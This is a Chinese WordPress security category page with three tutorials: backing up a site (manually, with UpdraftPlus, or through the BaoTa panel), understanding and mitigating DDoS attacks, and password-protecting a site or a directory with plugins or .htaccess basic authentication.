分类: WordPress安全

  • 如何轻松备份WordPress网站(3种方法)

    如何轻松备份WordPress网站(3种方法)

    备份您的网站不容忽视。在许多情况下,备份您的WordPress网站可以省去很多麻烦。例如,如果您遇到导致站点中断或更新影响其功能的错误,您将能够回滚已保存的版本。

    恢复WordPress备份可以为您节省数小时的故障排除时间。另外,拥有一个意味着您可以复制您的网站或将其移至新主机。我们甚至会说,如果您没有最近的备份,则应将其添加到待办事项列表的顶部。

    在本文中,我们将准确地向您展示如何做到这一点。我们将讨论您需要备份WordPress网站的哪些部分,并向您展示三种方法,包括手动方法、使用插件及通过您的主机上的功能进行WordPress备份。

    1. WordPress网站备份简介
    2. 何时备份您的WordPress网站
    3. 如何备份WordPress网站(3种方法)

    WordPress网站备份简介

    WordPress网站不仅仅是一个简单的文件集合,您可以将这些文件从一个位置复制并粘贴到另一个位置。如果您问自己,“我需要复制哪些文件来进行WordPress站点备份?” 然后知道你的问题有两个部分的答案:

    1. 存在于WordPress目录中的所有文件
    2. 您的WordPress数据库

    WordPress根目录是您设置为您的网站提供支持的WordPress副本的文件夹。您应该通过文件传输协议 (FTP)安全外壳访问 (SSH)连接到您的服务器, 然后找到名为rootpublicpublic_html的文件夹来访问该目录。

    在某些情况下,该目录还可以包含您网站的名称:

    访问您的WordPress网站的根目录

    访问您的WordPress网站的根目录

    根目录包含从主题到插件和媒体文件的所有内容。它的一些文件包括您的网站如何与其服务器交互的规则、您添加到主题和插件中的新功能等等。

    简而言之,该目录包含使WordPress工作的所有文件。但是,您实际网站的内容驻留在唯一的数据库中。您在下面看到的每个表都存储了WordPress站点的数据:

    一个WordPress数据库及其表

    一个WordPress数据库及其表

    备份数据库涉及导出所有这些表(通常为SQL格式)。然后您导入该文件的内容,您的数据库软件将覆盖现有值。

    如果这还没有多大意义,请不要担心。我们将在以下部分之一中向您展示如何手动备份WordPress网站。如果您不喜欢弄乱数据库或手动复制文件的想法,请使用备份WordPress站点插件。

    本质上,WordPress备份插件会创建站点文件及其数据库的副本(一起或单独)。然后这些插件使您能够选择要“恢复”的备份文件。这意味着用备份文件中的文件和数据库表覆盖现有文件和数据库表。

    如果您使用信誉良好的网络主机,它可能还提供自动站点备份。此功能意味着您不必担心手动创建备份或使用插件,因为您的网络主机会为您完成。它还应该将这些备份存储一段时间以备不时之需。

    何时备份您的WordPress网站

    简短的回答是您应该始终对您的网站进行最近的备份。想象一下今天遇到了一个破坏站点的错误,却不知道如何解决它。

    如果你有一个一天或更短的备份,你可能会没事的。但是,如果它是一周前的,它可能不包括您网站的一些最新更新。一个多月,它可能会丢失您在此期间所做的重要更改。

    问问自己,在不对网站产生负面影响的情况下,您认为可能会丢失多少最近的数据。如果您运行静态站点,偶尔备份应该没问题。但是,对于论坛、在线商店、博客和大多数大型网站,一致的备份是必要的:

    最近的网站备份列表

    最近的网站备份列表

    如果您四处寻找网络托管服务,您会注意到其中许多将每日备份作为重要卖点。如果您选择WordPress托管,您应该至少收到每日备份。

    这似乎有点矫枉过正,但如果它能让您避免丢失一次关键数据,那么增加的价格肯定是值得的——这通常可以忽略不计。许多WordPress插件还使您能够安排备份,如果您使用不包含备份功能的预算共享主机作为交易的一部分,这可以派上用场。

    这给我们带来了手动备份WordPress的显着缺点:您无法自动化该过程。对于如此重要​​的事情,我们建议采用简化的方法,以最大程度地减少某人忘记备份甚至错误丢失一些文件的机会。

    最后一个警告是,在对其进行重大更改、将其移动到新主机或更改站点的域之前,您应该始终备份整个站点。如果您曾经问​​过自己,“如何在更新之前备份我的 WordPress 网站?” 然后继续阅读以下部分以找到最适合您的方法。

    如何备份WordPress网站(3种方法)

    既然我们已经介绍了备份网站的重要性,现在是时候探索如何去做了。让我们看看如何使用四种方法备份WordPress网站。

    1. 如何手动备份WordPress网站

    正如我们之前提到的,备份WordPress网站涉及复制其所有文件并导出其数据库的内容。您可以使用FileZilla等文件传输协议 (FTP) 客户端执行这两项任务中的第一项。

    您的网络主机应为您提供一组凭据,您可以使用这些凭据通过FTP或在我们的示例中为SFTP连接到您的网站。

    使用这些凭据,您将能够连接到您的服务器并找到您的WordPress根目录。在许多情况下,该目录称为public 要开始,请继续复制或下载整个文件夹:

    下载WordPress根目录

    下载WordPress根目录

    下载可能需要一段时间,因为大多数WordPress网站都包含数百或数千个文件。备份完成后,我们建议您将该文件夹重命名为备份日期,然后将其存储在安全位置。它可以让您将整个WordPress网站(包括所有媒体)保存在您的PC或云存储解决方案中。

    这就回答了“如何使用FTP 备份我的WordPress网站?”这个问题。— 这给我们留下了您的数据库。备份该元素的最简单方法是转到您的主机控制面板并查找您的数据库管理软件。

    您需要进入您网站对应的数据的phpMyAdmin它将启动数据库管理器。从左侧菜单中选择您网站的数据库,您应该会看到如下表的列表:

    phpMyAdmin中的WordPress数据库表

    phpMyAdmin中的WordPress数据库表

    接下来,在屏幕顶部的菜单中选择ExportphpMyAdmin会询问您要使用哪种导出方法。Quick选项将自动将您站点的所有表包含在SQL文件中,这正是我们想要的。

    确保在Format下选择SQL 然后单击Go

    从phpMyAdmin导出您网站的表格

    从phpMyAdmin导出您网站的表格

    您的数据库文件应立即下载。而已!

    在这个阶段,您拥有WordPress根目录及其数据库的副本。您可以将站点目录和数据库SQL文件压缩在一起,以备不时之需。

    恢复您的手动备份

    如果您需要恢复手动备份,最好的方法是将备份根文件夹以不同的名称上传到您的服务器(与当前服务器处于同一级别)。目录启动后,您可以删除当前的根文件夹并将备份重命名为其原始值。

    之后,是时候恢复您的数据库备份了。为此,请返回 phpMyAdmin 并找到您站点的数据库。这一次,选择屏幕顶部的Import选项。

    phpMyAdmin将要求您选择要导入的文件并指定其格式:

    通过phpMyAdmin导入数据库文件

    通过phpMyAdmin导入数据库文件

    选择要导入的数据库备份文件,然后单击屏幕底部的执行。导入过程完成后,您将看到一条成功消息。

    在这个阶段,如果您访问您的网站,您的备份将替换其最新版本。如果您恢复备份以解决您的网站问题,它现在应该可以正常工作。

    2. 如何使用备份WordPress插件

    您可以使用很多WordPress备份插件。但是,我们可以将它们分为两大类:

    1. 全站点备份插件:这种类型的插件会生成您网站的完整副本并将其保存以备不时之需。
    2. 增量备份插件:该系列插件仅在您对网站进行更改时生成备份,因此您可以避免占用不必要的服务器存储空间。

    这两种插件的另一个区别是增量备份工具往往要花钱。但是,您可以使用许多免费的全站点备份工具。

    如果您对增量备份插件感兴趣,我们在之前的博客文章中提供了我们最喜欢的备份插件列表。在本节中,我们将向您展示如何使用最流行的免费解决方案之一UpdraftPlus

    UpdraftPlus插件

    UpdraftPlus插件

    大多数WordPress备份插件的工作方式类似,这意味着如果您知道如何使用其中一个,您应该能够找到解决其他同类工具的方法。UpdraftPlus也不例外,您可以使用它在几分钟内创建完整的站点备份。

    要开始使用,请安装并激活插件,然后转到WordPress仪表板中的设置> UpdraftPlus Backups。接下来,单击Backup Now按钮:

    使用UpdraftPlus创建WordPress站点备份

    使用UpdraftPlus创建WordPress站点备份

    如您所见,UpdraftPlus还提供增量备份。但是,该功能仅适用于插件的高级版本,因此我们将在本教程中忽略它。

    单击该按钮后,UpdraftPlus将询问您希望将网站的哪些部分包含在备份中。默认情况下,它们同时拥有您网站的文件及其数据库:

    选择要包含在WordPress备份中的元素

    选择要包含在WordPress备份中的元素

    点击窗口底部的确认按钮,等待插件生成您的备份文件。现在,如果您向下滚动到Existing backups部分,您将看到您最近的备份(现在应该只有一个):

    您现有的WordPress站点备份的列表

    您现有的WordPress站点备份的列表

    UpdraftPlus使您能够单独下载任何备份文件组件,例如其插件、主题、上传文件甚至数据库。您还可以通过单击相应的按钮来删除或恢复备份。

    恢复您的UpdraftPlus备份

    恢复UpdraftPlus备份是一件简单的事情。该插件会询问您要恢复哪些组件,您应该选择所有组件:

    恢复UpdraftPlus WordPress备份

    恢复UpdraftPlus WordPress备份

    您需要确认要继续还原备份。完成后,插件将负责其余的工作。该过程完成后,您的站点将返回到之前的版本。

    简而言之,这就是大多数WordPress备份插件的工作方式。但是,大多数免费工具缺少的一项功能是安排WordPress站点备份,其中使用了以下方法。

    3. 如何通过主机备份您的WordPress网站

    如果您使用信誉良好的网络主机或者通过宝塔管理服务器,它应该为您提供自动备份。但是,这些备份的频率可能会有所不同。例如,在 宝塔面板,您可以跟进实际需要设置每天甚至每小时的自动备份,您可以通过登录您的托管仪表板来访问这些备份。

    但是,这不是我们提供的唯一备份类型。在以下部分中,我们将向您展示如何访问您的自动备份。

    如何通过宝塔面板执行网站文件或数据库备份

    在宝塔面板,您可以设置WordPress备份计划。但是,在进行任何重大更改之前创建手动备份仍然是明智之举。要创建此安全网,请登录您的宝塔仪表盘。然后,单击左侧的“网站”菜单,找到你需要备份的网站对应的备份操作,然后在弹窗中点击“备份站点”。

    在宝塔面板执行网站备案操作

    在宝塔面板执行网站备案操作

    接下来,进行网站数据库备份,选择数据库菜单项。找到你需要备份的站点对应的数据库,点击备份列对应的操作项,然后单击弹窗的备份数据库按钮。

    备份网站数据库

    备份网站数据库

    您也可以通过宝塔面板的计划任务,来创建备份网站或者备份数据库任务,可以设置执行周期,对您的网站文件和数据库按周期定期备份,这是一个非常方便的功能。

    宝塔面板计划任务

    小结

    学习如何备份WordPress网站比您想象的要容易。您可以手动执行此操作,使用插件,甚至让您的虚拟主机负责整个过程。

    WordPress站点备份的最简单和最安全的方法是使用自动化它们的托管服务提供商。在宝塔,我们还可以实现WordPress备份自动化任务。

  • 什么是DDoS攻击及应如何应对

    什么是DDoS攻击及应如何应对

    DDoS攻击非常容易实施,每年都会影响全球数百万个网站,而且攻击数量还在不断增加。

    遭受DDoS攻击似乎是上网不可避免的副作用;您的网站越成功,您就越有可能在某个时候成为攻击的目标。但是您可以减少DDoS攻击影响您的站点的机会。

    您可能想知道:什么是DDoS攻击?我怎样才能保护我的网站免受他们的侵害?

    任何经营任何类型的在线企业的人都应该警惕DDoS攻击。或者分布式拒绝服务攻击。这基本上是说有人想要关闭您的网站或服务,因此他们从各个点发送大量流量来淹没您,并使您难以关闭甚至追踪攻击的来源。它们使您的服务器成为瓶颈,因此您的普通访客被拒绝提供服务。这是在线状态可能发生的最琐碎和最令人沮丧的事情之一。

    在这篇文章中,我们将解释什么是DDoS攻击,探索可能使您的网站易受攻击的原因,并概述可以降低其概率和影响的方法。

    1. 什么是DDoS攻击?
    2. 为什么有人会对您的网站进行DDoS攻击?
    3. DDoS攻击的影响
    4. 什么会使您的网站容易受到DDoS攻击?
    5. 如何保护您的网站免受DDoS攻击

    什么是DDoS攻击?

    让我们首先检查一下DDoS攻击是什么,重要的是,它不是什么。

    DDoS代表分布式拒绝服务,但通常被称为简单的拒绝服务。DDoS攻击包括网站在短时间内被请求淹没,目的是使网站不堪重负并导致其崩溃。“分布式”元素意味着这些攻击同时来自多个位置,而DoS仅来自一个位置。

    大多数DDoS攻击是由僵尸网络执行的,僵尸网络是“一组被恶意软件感染并处于恶意用户控制之下的计算机”。然后这些机器被劫持并用于攻击攻击者想要拒绝服务的任何服务。

    虽然构成僵尸网络的计算机被恶意软件感染,但请务必注意,如果您的WordPress网站受到DDoS攻击,则您的网站并未感染恶意软件。DDoS只是阻止正常流量到达您的身边。但是,如果您的计算机已经受到安全漏洞的危害,您的服务器可能会成为僵尸网络的一部分,对其他人进行DDoS攻击。

    如果您的站点遭受DDoS攻击,您将在几分钟甚至几小时内收到来自多个来源的数千个请求。这些请求并不是网站突然流量激增的结果:它们是自动化的,并且来自有限数量的来源,具体取决于攻击的规模。

    在下面的屏幕截图中,您可以看到在DDoS攻击期间站点收到的请求突然激增。

    DDoS攻击流量

    DDoS攻击流量

    DDoS攻击与黑客攻击不同,尽管两者可以联系起来;肇事者并没有试图访问您网站的文件或管理员,而是由于请求量大而导致网站崩溃或易受攻击。在某些情况下,随后会在网站易受攻击时尝试入侵该网站,但在大多数情况下,目的只是让网站停止工作。

    听起来好像没有任何方法可以避免DDoS攻击:毕竟,如果有人决定用请求淹没您的站点,那么您无法阻止他们。

    但是,尽管您无法阻止有人试图通过DDoS攻击破坏您的网站,但您可以采取一些步骤来确保如果您受到攻击,您的网站不会停止工作并且不会停止工作容易受到黑客攻击。

    DDoS不是黑客攻击

    正如我们上面所说,DDoS攻击并不是试图利用漏洞来访问您的站点。这更像是蛮力攻击。那是特定方试图通过重复登录尝试和密码重置(委婉地说)来进入您的站点的时候。

    DDoSers不会试图获取您的密码、接管您的网站、安装恶意软件或将您的计算机用于不法手段。如果您受到DDoS攻击,您将被拒绝提供服务。没有人需要访问您的服务器,因为他们正在通过公共渠道轰炸它。不是像黑客入侵和蛮力攻击那样的后端。

    为什么您成为DDoS目标?

    为什么会有人这样对你?嗯,最常见的一个想法是黑客行动主义,其中一方希望阻止他们反对的想法或服务​​的传播。这可能出于多种原因,但如果您发布的内容可能引起分歧,黑客行动主义者可能会对您进行DDoS攻击。

    众所周知,企业间谍活动会发生,例如,在大型销售或一年中的某个时候,竞争对手将您关闭,以将更多利润转移给他们自己。或者可能是有人想要学习网络安全和DDoS攻击的来龙去脉。也许只是某个地方无聊的人认为这很有趣并想看着世界燃烧。(这种情况发生在PlayStation Network或Xbox Live或魔兽世界等在线游戏和服务中)。

    如果您看不到自己成为黑客行动主义者或公司破坏的目标,那么您可能只是想要对陌生人造成一些破坏的人的不幸目标。

    我们将在本文后面介绍这些步骤,但首先,让我们检查一下为什么有人可能想要在您的站点上发起DDoS攻击。

    为什么有人会对您的网站进行DDoS攻击?

    那么为什么有人会在您的WordPress网站上发起DDoS攻击呢?他们能从中得到什么?

    攻击者可能希望通过DDoS攻击使您的站点停止运行的原因有很多。这些包括竞争对手的攻击和因您的内容而受到的攻击。

    竞争对手的DDoS攻击

    在一个理想的世界里,你的竞争对手会试图通过改进他们的内容、搜索引擎优化和转化率来超越你,这是使用你的网站获得竞争优势的合法方式。

    但在某些情况下,竞争对手可能会采取更极端的措施。竞争对手可能会雇用某人在您的网站上发起DDoS攻击,因为他们知道这不仅会影响您的网站,还会影响您的业务。

    在您让您的网站重新运行所需的时间里,他们会从您那里抢走业务,尤其是当他们使用您的公司名称作为关键字投放广告时。如果您的网站没有快速重新启动和运行,您将失去搜索排名,并且可能会发现您的竞争对手现在在Google上的排名高于您。

    当然,很难证明谁实施了任何DDoS攻击。攻击不会来自竞争对手的IP地址!除非您财力雄厚,否则试图对您怀疑这样做的竞争对手采取法律行动不太可能成功。

    首先保护自己免受攻击的影响要好得多。并且不要试图对您的竞争对手发起另一次DDoS攻击作为回应。这是非法的,最好向自己保证,一个拼命使用此类措施的竞争对手可能不会像您的企业那样长寿或享有盛誉。

    对您的内容的DDoS攻击

    一些网站因其内容的性质而受到DDoS攻击。

    例如,举报网站可能会受到攻击。处理有争议的问题(例如获得堕胎或反种族主义)的网站可能会受到不同意其信息并希望使其停止运行的人的攻击。或者您的内容可能是商业的,但仍然很敏感,并且有些人不希望它在网上可用。

    如果您的网站被成功攻击,它将使您的内容无法流通,如果您的用户需要访问信息或指导,这可能会给他们带来问题。

    您还将花时间解决问题,失去您可能从该网站获得的任何收入(如果您是非营利组织,则可能是销售或捐赠),如果您的网站在数小时内或好几天天返回502错误

    出于政治动机的DDoS攻击

    随着网络威胁越来越多地被用来破坏政治进程,出于政治动机的DDoS攻击变得越来越普遍。

    如果您的网站是为政党、候选人或组织服务的,或推进特定的政治事业,那么它可能容易受到不同意您的政治观点的人的攻击。

    这不会不必要地来自你的政治对手。它更有可能来自寻求破坏政治辩论、阻止某些类型的内容并利用混乱来迷惑和剥夺人们权利的外部来源。

    攻击可能是试图使人们无法访问您的内容(见上文),也可能是对网站背后的个人候选人或组织的更加个人化的攻击。

    这与由于新闻周期导致访问量激增而导致网站超载不同。我曾经在一个政党的网站上工作,当该党的竞选宣言发布以进行大选时,该网站变得不堪重负。那是英国第一次选举,其中电子竞选很重要,我们只是没有为交通量做好准备。

    相反,DDoS攻击会更加尖锐和突然,有时会在几分钟内看到请求的突然激增。这看起来与流量的自然高峰非常不同,虽然它可能是突然的,但通常会采用曲线而不是悬崖的形式。

    如果您正在开展一项活动(由于额外的宣传,这可能使您更容易受到攻击),那么确保您的网站保持正常运行并且在您可能专注于活动活动时不要浪费时间处理攻击将尤为重要. 这就是为什么采取以下步骤来保护您的网站免受出于政治动机的DDoS攻击至关重要的原因。

    DDoS攻击的影响

    DDoS攻击可能会产生多种影响,具体取决于攻击的性质以及您对此的准备程度。

    1. 网站停机时间

    最直接和最明显的影响是您的网站不堪重负,变得不可用。

    这意味着您通过您的网站获得的任何业务在您让网站重新运行之前都将无法使用。它还会影响您作为网站所有者的声誉。如果您不快速修复该网站,它可能会影响您的SEO,就像Google抓取您的网站并发现它无法运行一样,您将失去排名。

    如果您的网站由于超载而无法使用,它将返回502 bad gateway错误,如果您允许它保持这种状态太久,这将对您的搜索排名产生负面影响。

    我还看到了网站在几天内无法使用的攻击(因为所有者不知道如何修复它并且没有保留备份,很快就会有更多备份),以及网站何时可用重新上线,该网站的Google列表中的所有内部链接都已丢失。

    2. 服务器和托管问题

    如果您的网站经常受到您未采取措施缓解的攻击,这可能会导致您的托管服务提供商出现问题。

    一个好的托管服务提供商会为您提供工具来保护您的网站免受DDoS攻击,但如果您没有此工具并且您使用的是共享托管服务,那么攻击可能会影响同一服务器上的其他网站。

    3. 网站漏洞

    DDoS攻击可能会使您的网站更容易受到黑客攻击,因为您的所有系统都专注于让网站重新上线,而安全系统可能已因攻击而无法运行。

    一旦DDoS攻击成功使您的网站瘫痪,黑客可能会发现更容易通过后门进入您的网站。

    像这样的后续攻击并不总是来自与构成DDoS攻击的请求相同的来源:聪明的黑客会知道如何隐藏他们的踪迹并使用多个IP地址来攻击您的站点,以及如何隐藏他们的真实位置。

    因此,如果您是DDoS攻击的受害者,您的首要任务之一应该是确保您的WordPress网站是安全的。这可以说比让您的面向公众的网站重新启动并运行更重要,因为另一次攻击只会让您回到原点(或更糟)。

    4. 浪费时间和金钱

    修复遭受DDoS攻击的网站需要时间。也需要钱。

    如果您不知道您的站点发生了什么并且没有为攻击的可能性做好准备,您最终可能不得不从头开始重建您的站点(我已经看到发生这种情况的站点)。如果你没有备份你的网站,你打算从什么地方恢复它?如果您不快速修复它,攻击可能会对您网站的SEO和业务绩效产生长期影响。

    当网站关闭时,您可能会损失收入,尤其是当您的网站是电子商务商店时。而且您可能需要花钱聘请安全专家或网络信封人员来重建您的网站,并确保它免受未来的攻击。

    所有这些都强调了保护您的站点免受DDoS攻击的重要性。我有一位客户由于其业务性质而经常遭受攻击未遂;因为我们设置了安全措施,所以这些措施从未对网站产生影响。如果您准备好了,那么DDoS攻击也不应该影响您的站点。

    什么会使您的网站容易受到DDoS攻击?

    一些站点比其他站点更容易受到DDoS攻击。这些将使您更容易受到攻击或其后遗症的影响。

    廉价托管

    与各种网络攻击一样,DDoS攻击易受攻击的第一个罪魁祸首是廉价托管。

    廉价托管有两个主要缺点:缺乏支持和客户数量。

    为了以如此低廉的价格提供托管服务,托管服务提供商将拥有大量使用同一服务器的客户端,这意味着如果该服务器上的其他站点之一受到攻击,它可能会影响您。

    廉价的托管服务提供商不会提供针对DDoS攻击的安全预防措施,它们不会在攻击发生时向您发出警告,也不会在站点停止工作时帮助您修复站点。他们不会对您的网站进行定期备份,即使他们这样做,他们也不太可能帮助您恢复您的网站:您必须自己弄清楚如何做。

    这并不是因为廉价的托管服务提供商试图欺骗您,也不是因为他们没有提供他们承诺的服务:这仅仅是因为为了让他们的托管服务便宜,他们不得不吝啬支持。否则,他们不会盈利。

    如果您的网站支持您的声誉和网站安全性很重要的企业或任何企业,那么投资优质托管是值得的。如果您避免在网站受到攻击时花时间修复您的网站,那么额外的费用将是值得的,如果这意味着您的网站通过尝试的 DDoS 攻击保持在线并且没有受到损害,那么这当然是值得的。

    缺乏准备

    未能为DDoS攻击的可能性做好准备并不一定能阻止这种攻击的发生,但这意味着如果您受到攻击,您就不会遭受太多痛苦。

    首先,针对潜在攻击采取安全预防措施将提高您的网站在遭受未遂攻击的情况下仍保持在线的机会。

    但了解如何阻止DDoS攻击也将有所帮助。如果您的站点受到攻击并且如果您已做好准备而确实出现故障,那么您将能够比您没有做好准备时更快地重新启动并运行它。

    安装安全软件或使用您的托管服务提供商提供的安全警报意味着如果您的网站确实受到攻击,您将收到警报,您或您的托管服务提供商都可以采取措施保护您的网站。

    定期备份您的站点意味着您可以在遇到问题时快速恢复它。

    使您的站点保持最新意味着它本质上更安全,并且如果您必须重建它,则不太可能遇到问题。

    不安全或过时的代码

    使您的WordPress版本以及主题和插件保持最新状态并不能保护您免受DDoS攻击。

    但是,如果您受到攻击并且您网站的后续弱点被黑客用作获得不必要访问的机会,那么如果您的网站管理良好,他们成功的可能性将大大降低。

    预防措施包括使您的网站保持最新以及仅安装来自信誉良好的来源的插件和主题。到目前为止,WordPress 主题和插件目录是查找免费主题和插件的最佳场所,信誉良好的开发人员将在那里提供它们。小心不要安装可能导致与您的主机不兼容的代码,也 不要安装无效的主题或插件

    如何保护您的网站免受DDoS攻击

    无论您可能成为DDoS攻击目标的原因是什么,您都应该采取预防措施以防止它发生在您和您的WordPress网站上。保护您的WP安装免受拒绝服务攻击与防止其他攻击没有什么不同。至少从你的角度来看。底层保护的工作方式大不相同。但是作为WordPress用户,您很幸运能够将其留给开发人员和专家,并从他们的辛勤工作和专业知识中获得回报。

    那么现在对于您一直渴望知道答案的问题:您如何保护您的站点免受DDoS攻击?

    您可以采取多种预防措施,具体选择取决于您的设置、预算和偏好。

    定期更新WordPress

    这应该是显而易见的,不用说。但我们想说。确保您的WordPress安装是最新的。如果您仍在使用5.7版本,而最新版本是5.8,那么您不仅会让入侵者访问您的网站,而且还会受到DDoS攻击。至少是间接的。如果您保持WP更新,您可以使用最新版本的安全插件,此外您还修补了任何安全漏洞,以防止您的服务器被感染并被纳入DDoS僵尸网络。

    使用安全插件

    WordFence、iThemes、Sucuri和许多其他免费选项可确保您的WordPress安装安全。充分利用它们。最重要的是,您需要安装WAF。代表Web应用程序防火墙,WAF是您抵御传入僵尸网络的最佳防御。

    通常,防火墙会在您的服务器周围设置一个边界,并确定哪些人可以进入,哪些人不能进入。规则(称为策略)适用于黑名单或白名单优先级。WAF开发人员和团队阻止(或列入黑名单)已知僵尸网络、它们的区域和 IP。这可以保护您的站点免受已知威胁的侵害,但如果其他地方出现新威胁,您可能仍然处于危险之中。

    然后,白名单通过仅允许已知流量访问您的站点来防止这两种情况发生。您无法获得DDoS攻击,因为您还没有预先批准这些IP范围或区域来访问您的站点。如果您的主要业务来自某些国家或地区,这是防止未知僵尸网络和攻击者访问您网站的有效方法。DDoS或蛮力或其他任何东西,如果你没有说“进来”,它就不会进来。

    WAF的这两种方法各有利弊,但总的来说,开发人员有一套强大的预定义策略,可以确保您的站点安全和有效运行。

    检查日志

    WordPress日志是大多数用户不知道或不关心的东西。但是,如果您面临DDoS攻击的风险,保留日志并查看流量来自何处以及您的服务器出现的任何错误对于确保一切正常运行都是非常宝贵的。请注意,在凌晨3点03分,来自世界另一端的176次登录尝试足以保证您的注意力并完成更新过程、进行备份、扫描和检查恶意软件等。

    你的主机应该有你可以查看的日志,WordPress Codex有关于调试日志的详细信息。

    选择优质服务器提供商

    一些大型的服务器提供商提供许多功能,可以减少您受到DDoS攻击的机会。

    比如集成Cloudflare的保护,该集成具有带有内置DDoS保护的安全防火墙。我们还利用严格的基于软件的限制来进一步保护您的网站。所有这些都使DDoS攻击更难通过。

    一旦DDoS攻击开始,另一个可以帮助抵御攻击功能是IP地理定位阻止。服务器防火墙将检测到任何DDoS攻击并提醒您注意。然后,您可以使用地理IP拦截功能来阻止DDoS攻击来自的地理区域。

    这意味着您可以安全地阻止攻击来自的地理区域,并且该区域的IP地址将不再能够向您的站点发送请求。

    然而,这是一个残酷的事实:无论您的托管服务提供商多么出色,他们都不可能提供针对DDoS攻击的全面保护。一个好的托管服务提供商会做的是提供一个好的防火墙,这将减少攻击的机会,但不会完全摆脱它。他们还将拥有您或他们可以用来在DDoS攻击开始后阻止它的工具,例如IP拦截。

    这就是为什么任何声称可以为您提供全面保护免受DDoS攻击的托管服务提供商并不是完全诚实的原因。它们可以降低攻击的可能性并限制攻击的影响,但它们不能完全阻止DDoS攻击。

    相反,为了更彻底地保护自己免受DDoS攻击,您需要使用一个庞大的网络,该网络可以使用其关于世界各地其他站点的攻击信息数据库来预测攻击并阻止它们可能来自的IP。让我们看一下其中的几个服务。

    Cloudflare

    Cloudflare是互联网上最受欢迎的内容交付网络提供商之一,它还提供针对攻击和黑客的保护。由于其庞大的规模,它可以访问有关DDoS攻击来自何处的信息,然后可以阻止其网络上所有站点的这些IP地址。

    Cloudflare DDoS保护

    Cloudflare DDoS保护

    Cloudflare的基于云的网络始终处于开启状态并始终在学习,这意味着它可以识别潜在的攻击并阻止不需要的流量24/7到达您的站点。它还为您提供了一个仪表板,您可以使用它来监控和缓解DDoS攻击,这样您就可以确定您的漏洞可能是什么。

    Sucuri

    Sucuri是一家以在黑客攻击后清理网站并帮助防止它们再次发生的服务而闻名的公司。但它也提供DDoS保护

    Sucuri DDoS防护

    Sucuri DDoS防护

    Sucuri的服务之所以有效,是因为它的规模如此之大,拥有超过400,000个客户的网络,这意味着它可以像Cloudflare一样保存攻击数据库。然后可以在您的站点上拦截这些IP地址。

    Sucuri的网络没有Cloudflare的那么大,但如果您还需要高级安全功能和监控,该公司值得考虑,这是他们的专长所在。Sucuri将监控您的站点是否存在停机时间和攻击或黑客攻击,并将修复发生的任何黑客攻击。

    因此,如果您确实遭受了DDoS攻击,并且您的WordPress网站在易受攻击时遭到黑客攻击,那么与Sucuri合作意味着您可以尽快启动并再次运行它。

    概括

    DDoS攻击正变得越来越普遍,它们有可能造成数十亿美元的损失。

    最后,大多数WordPress用户可能不会面临遭受DDoS攻击的风险。但没有人能预知意外。这就是为什么设置安全来处理它是如此重要。但是,只要您将内容发布在那里,成功并被公众看到,或者引起了错误的关注,您的生计就有可能受到威胁。如果人们真的愿意,可以很容易地雇用DDoS僵尸网络,因此设置WAF和一些日志记录并做好准备是非常值得的。

    完全保护自己免受DDoS攻击是不可能的,因为您无法控制进入您网站的流量。但是,如果您使用上述服务之一,避免廉价托管,并为DDoS攻击做好准备(如果确实发生了),那么您遭受损失的可能性就会小得多。

    不过,老实说,按照以往经验,当你遭遇充满恶意的DDos攻击,很多时候你只能够静默它过去。上述的手段自然有一定的作用,此外,增加DDoS攻击预防硬件防火墙也是有效的措施,但其起飞的价格让大部分小站长望而却步。

    对了,选择可临时超额使用配置的服务器也是一个不是方法的方法。

  • 如何使用密码保护您的WordPress网站

    如何使用密码保护您的WordPress网站

    寻找一种密码保护WordPress的方法?有很多不同的方法可以为您的网站添加密码保护,包括密码保护您的整个WordPress网站、仅保护特定内容,甚至仅保护其他公开内容的一部分。

    其中一些解决方案需要使用插件,而其他解决方案则使用您可以在服务器级别进行的核心WordPress功能或配置。

    在这篇文章中,我们将尝试涵盖尽可能多的不同方法。总的来说,您将学习:

    1. 如何使用密码保护您的整个WordPress网站
    2. 如何使用密码保护目录
    3. 如何使用密码保护文章、页面和WooCommerce产品
    4. 如何使用密码保护某个类别的WordPress文章
    5. 如何密码保护WordPress文章的一部分

    您可以单击上面的任何链接直接跳转到特定方法,或者您可以通读以了解如何使用密码保护您的WordPress网站的所有方法。

    如何使用密码保护您的整个WordPress网站

    如果你想用密码保护你的整个 WordPress 网站,你有两个主要选择:

    • 一个插件
    • 服务器级别的HTTP身份验证

    在这两者中,插件方法对于面向用户的站点来说肯定更加用户友好和更好,而HTTP身份验证是密码保护WordPress登台站点或其他类型的非面向用户站点的有效方法。

    如何使用插件对WordPress网站进行密码保护

    为了对您的整个WordPress网站进行密码保护,我们推荐Ben Huson提供的免费密码保护插件,该插件在WordPress.org上获得了很高的评价和可用。

    安装并激活插件后,您可以转到“设置”→“Password Protected”来配置插件的设置。

    选中Password Protected Status框以启用密码保护并在New Password框中输入所需的密码。

    该插件的另一个好处是它还为您提供了将某些类型的用户/请求以及IP地址列入白名单的选项。如果需要,您可以配置这些:

    如何使用密码保护您的整个WordPress网站

    如何使用密码保护您的整个WordPress网站

    激活它后,任何尝试访问您网站的人都需要在精简版的WordPress登录页面中输入密码:

    全站密码表格

    全站密码表格

    如果您想将登录页面徽标从通用WordPress徽标更改,您可以使用免费的Login Logo插件

    如何使用HTTP身份验证对WordPress网站进行密码保护

    通过基本的HTTP身份验证(又名htpasswd保护),您可以在人们加载您的网站之前添加额外的密码保护层,这就是为什么它是WordPress登台或开发网站的绝佳选择。

    您可以参考教程为您的WordPress网站启用htpasswd保护

    启用后,您的WordPress网站将需要身份验证才能访问它。您可以随时更改凭据或在不再需要时将其禁用。

    .htpasswd身份验证提示

    .htpasswd身份验证提示

    如何使用密码保护目录

    需要密码保护您网站上的目录?也许您有一个位于WordPress安装之外的文件夹,您不希望公众访问该文件夹。

    apache

    要手动设置,您首先需要创建一个 .htpasswd文件。您可以使用这个方便的生成器工具。然后将文件上传到您要保护的目录。

    www/user/public/protecteddirectory
    www/user/public/protecteddirectory
    www/user/public/protecteddirectory

    然后用下面的代码创建一个.htaccess文件,上传到你要保护的目录的路径下。确保更新目录路径和用户名。

    AuthType Basic
    AuthName “restricted area”
    AuthUserFile /www/user/public/protecteddirectory.htpasswd
    require valid-user
    AuthType Basic
    AuthName “restricted area”
    AuthUserFile /www/user/public/protecteddirectory.htpasswd
    require valid-user
    AuthType Basic  
    AuthName "restricted area"  
    AuthUserFile /www/user/public/protecteddirectory.htpasswd  
    require valid-user
    

    Nginx

    如果您正在运行Nginx,您还可以使用HTTP基本身份验证来限制访问。看看这个教程

    如果您使用具有cPanel的提供商进行托管,您可以使用位于“Files”部分下的“Directory Privacy”工具设置受密码保护的目录。

    cPanel目录隐私

